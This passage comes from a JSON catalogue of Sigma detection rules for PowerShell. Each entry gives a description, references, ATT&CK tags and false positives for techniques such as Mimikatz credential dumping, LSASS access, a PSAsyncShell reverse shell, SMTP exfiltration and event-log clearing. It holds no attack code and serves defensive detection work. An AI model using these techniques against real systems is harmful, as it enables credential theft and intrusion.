"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137.006/T1137.006.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137.006" - ], - "creation_date": "2021/12/28", - "filename": "posh_ps_office_comobject_registerxll.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", - "uuid": "189e3b02-82b2-4b90-9662-411eb64486d4", - "value": "Potential Invoke-Mimikatz PowerShell Script", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/potential-invoke-mimikatz-powershell-script.html#potential-invoke-mimikatz-powershell-script", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ], - "creation_date": "2022/09/28", - "filename": "posh_ps_potential_invoke_mimikatz.yml", - "author": "Tim Rauch", - "level": "high", - "falsepositive": [ - "Mimikatz can be useful for testing the security of networks" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", - "uuid": "dcd74b95-3f36-4ed9-9598-0490951643aa", - "value": "Malicious PowerView PowerShell Commandlets", - "meta": { - "refs": [ - "https://powersploit.readthedocs.io/en/stable/Recon/README", - "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon", - "https://thedfirreport.com/2020/10/08/ryuks-return", - "https://adsecurity.org/?p=2277", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2021/05/18", - "filename": "posh_ps_powerview_malicious_commandlets.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Should not be any as administrators do not use this tool" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects PowerShell calling a credential prompt", - "uuid": "ca8b77a9-d499-4095-b793-5d5f330d450e", - "value": "PowerShell Credential Prompt", - "meta": { - "refs": [ - "https://twitter.com/JohnLaTwC/status/850381440629981184", - "https://t.co/ezOTGy1a1G", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml" - ], - "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/04/09", - "filename": "posh_ps_prompt_credentials.yml", - "author": "John Lambert (idea), Florian Roth (rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", - "uuid": "afd3df04-948d-46f6-ae44-25966c44b97f", - "value": "PSAsyncShell - Asynchronous TCP Reverse Shell", - "meta": { - "refs": [ - "https://github.com/JoelGMSec/PSAsyncShell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2022/10/04", - "filename": "posh_ps_psasyncshell.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, 
- { - "description": "Detects the use of PSAttack PowerShell hack tool", - "uuid": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", - "value": "PowerShell PSAttack", - "meta": { - "refs": [ - "https://adsecurity.org/?p=2921", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psattack.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/05", - "filename": "posh_ps_psattack.yml", - "author": "Sean Metcalf (source), Florian Roth (rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system\n", - "uuid": "a0edd39f-a0c6-4c17-8141-261f958e8d8f", - "value": "PowerShell Remote Session Creation", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remote_session_creation.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2022/01/06", - "filename": "posh_ps_remote_session_creation.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate administrative script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Powershell Remove-Item with -Path to delete a file or a folder with \"-Recurse\"", - "uuid": "b8af5f36-1361-4ebe-9e76-e36128d947bf", - "value": "Use Remove-Item to Delete File", - "meta": { - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remove_item_path.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], - "creation_date": "2022/01/15", - "filename": "posh_ps_remove_item_path.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", - "uuid": "a861d835-af37-4930-bcd6-5b178bfb54df", - "value": "Request A Single Ticket via PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003" - ], - "creation_date": "2021/12/28", - "filename": "posh_ps_request_kerberos_ticket.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "uuid": 
"42821614-9264-4761-acfc-5772c3286f76", - "value": "Root Certificate Installed - PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.004" - ], - "creation_date": "2020/10/10", - "filename": "posh_ps_root_certificate_installed.yml", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", - "level": "medium", - "falsepositive": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", - "uuid": "902cedee-0398-4e3a-8183-6f3a89773a96", - "value": "Suspicious Invoke-Item From Mount-DiskImage", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso", - "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.005" - ], - "creation_date": "2022/02/01", - "filename": "posh_ps_run_from_mount_diskimage.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to get a listing of 
security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.\nThis may include things such as firewall rules and anti-viru\n", - "uuid": "904e8e61-8edf-4350-b59c-b905fc8e810c", - "value": "Security Software Discovery by Powershell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_security_software_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1518.001" - ], - "creation_date": "2021/12/16", - "filename": "posh_ps_security_software_discovery.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", - "uuid": "9a7afa56-4762-43eb-807d-c3dc9ffe211b", - "value": "Powershell Exfiltration Over SMTP", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2", - "https://www.ietf.org/rfc/rfc2821.txt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ], - "creation_date": "2022/09/26", - "filename": "posh_ps_send_mailmessage.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate script" 
- ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detect adversaries enumerate sensitive files", - "uuid": "7d416556-6502-45b2-9bad-9d2f05f38997", - "value": "Powershell Sensitive File Discovery", - "meta": { - "refs": [ - "https://twitter.com/malmoeb/status/1570814999370801158", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083" - ], - "creation_date": "2022/09/16", - "filename": "posh_ps_sensitive_file_discovery.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects use of Set-ExecutionPolicy to set insecure policies", - "uuid": "61d0475c-173f-4844-86f7-f3eebae1c66b", - "value": "Change PowerShell Policies to an Insecure Level - PowerShell", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", - "https://adsecurity.org/?p=2604", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2021/10/20", - "filename": "posh_ps_set_policies_to_unsecure_level.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Administrator script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Base64 encoded Shellcode", - "uuid": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", - "value": "PowerShell ShellCode", - "meta": { - "refs": [ - "https://twitter.com/cyb3rops/status/1063072865992523776", 
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2018/11/17", - "filename": "posh_ps_shellcode_b64.yml", - "author": "David Ledbetter (shellcode), Florian Roth (rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Commandlet names from ShellIntel exploitation scripts.", - "uuid": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", - "value": "Malicious ShellIntel PowerShell Commandlets", - "meta": { - "refs": [ - "https://github.com/Shellntel/scripts/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2021/08/09", - "filename": "posh_ps_shellintel_malicious_commandlets.yml", - "author": "Max Altgelt, Tobias Michalski", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", - "uuid": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", - "value": "Detected Windows Software Discovery - PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", - "https://github.com/harleyQu1nn/AggressorScripts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_software_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1518" - ], 
- "creation_date": "2020/10/16", - "filename": "posh_ps_software_discovery.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", - "uuid": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", - "value": "Powershell Store File In Alternate Data Stream", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_store_file_in_alternate_data_stream.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ], - "creation_date": "2021/09/02", - "filename": "posh_ps_store_file_in_alternate_data_stream.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", - "uuid": "88f0884b-331d-403d-a3a1-b668cf035603", - "value": "AD Groups Or Users Enumeration Using PowerShell - ScriptBlock", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ], - "creation_date": "2021/12/15", - 
"filename": "posh_ps_susp_ad_group_reco.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event logs", - "uuid": "0f017df3-8f5a-414f-ad6b-24aff1128278", - "value": "Suspicious Eventlog Clear", - "meta": { - "refs": [ - "https://twitter.com/oroneequalsone/status/1568432028361830402", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", - "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.001" - ], - "creation_date": "2022/09/12", - "filename": "posh_ps_susp_clear_eventlog.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. 
The script should be investigated to determine if it's legitimate" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", - "uuid": "162e69a7-7981-4344-84a9-0f1c9a217a52", - "value": "Powershell Directory Enumeration", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", - "https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_directory_enum.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083" - ], - "creation_date": "2022/03/17", - "filename": "posh_ps_susp_directory_enum.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious PowerShell download command", - "uuid": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", - "value": "Suspicious PowerShell Download - Powershell Script", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_download.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/05", - "filename": "posh_ps_susp_download.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "PowerShell scripts that download content from the Internet" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be 
used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", - "uuid": "b5522a23-82da-44e5-9c8b-e10ed8955f88", - "value": "Powershell Execute Batch Script", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.003/T1059.003.md#atomic-test-1---create-and-execute-batch-script", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003" - ], - "creation_date": "2022/01/02", - "filename": "posh_ps_susp_execute_batch_script.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate administration script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", - "uuid": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", - "value": "Suspicious Export-PfxCertificate", - "meta": { - "refs": [ - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a", - "https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_export_pfxcertificate.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.004" - ], - "creation_date": "2021/04/23", - "filename": "posh_ps_susp_export_pfxcertificate.yml", - "author": "Florian Roth", - "level": "high", - 
"falsepositive": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", - "uuid": "bd5971a7-626d-46ab-8176-ed643f694f68", - "value": "Extracting Information with PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_extracting.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.001" - ], - "creation_date": "2021/12/19", - "filename": "posh_ps_susp_extracting.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of \"TroubleshootingPack\" cmdlets to leverage CVE-2022-30190 or action similar to \"msdt\" lolbin (as described in LOLBAS)", - "uuid": "03409c93-a7c7-49ba-9a4c-a00badf2a153", - "value": "Troubleshooting Pack Cmdlet Execution", - "meta": { - "refs": [ - "https://twitter.com/nas_bench/status/1537919885031772161", - "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2022/06/21", - "filename": 
"posh_ps_susp_follina_execution.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate usage of \"TroubleshootingPack\" cmdlet for troubleshooting purposes" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", - "uuid": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", - "value": "PowerShell Get-Process LSASS in ScriptBlock", - "meta": { - "refs": [ - "https://twitter.com/PythonResponder/status/1385064506049630211", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2021/04/23", - "filename": "posh_ps_susp_getprocess_lsass.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious Powershell code that execute COM Objects", - "uuid": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", - "value": "Suspicious GetTypeFromCLSID ShellExecute", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md#atomic-test-2---powershell-execute-com-object", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gettypefromclsid.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" - ], - "creation_date": "2022/04/02", - "filename": "posh_ps_susp_gettypefromclsid.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - 
"logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.", - "uuid": "bbb9495b-58fc-4016-b9df-9a3a1b67ca82", - "value": "Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy", - "https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1201" - ], - "creation_date": "2022/03/17", - "filename": "posh_ps_susp_get_addefaultdomainpasswordpolicy.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of PowerShell to identify the current logged user.", - "uuid": "4096a49c-7de4-4da0-a230-c66ccd56ea5a", - "value": "Suspicious PowerShell Get Current User", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_current_user.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033" - ], - "creation_date": 
"2022/04/04", - "filename": "posh_ps_susp_get_current_user.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detect use of Get-GPO to get one GPO or all the GPOs in a domain.", - "uuid": "eb2fd349-ec67-4caa-9143-d79c7fb34441", - "value": "Suspicious GPO Discovery With Get-GPO", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", - "https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_gpo.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1615" - ], - "creation_date": "2022/06/04", - "filename": "posh_ps_susp_get_gpo.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Get the processes that are running on the local computer.", - "uuid": "af4c87ce-bdda-4215-b998-15220772e993", - "value": "Suspicious Process Discovery With Get-Process", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_process.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1057" - ], - "creation_date": "2022/03/17", - "filename": "posh_ps_susp_get_process.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - 
"logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers", - "uuid": "0332a266-b584-47b4-933d-a00b103e1b37", - "value": "Suspicious Get-WmiObject", - "meta": { - "refs": [ - "https://attack.mitre.org/datasources/DS0005/", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gwmi.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546" - ], - "creation_date": "2022/01/12", - "filename": "posh_ps_susp_gwmi.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection", - "uuid": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", - "value": "Suspicious Hyper-V Cmdlets", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.006" - ], - "creation_date": "2022/04/09", - "filename": "posh_ps_susp_hyper_v_condlet.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects 
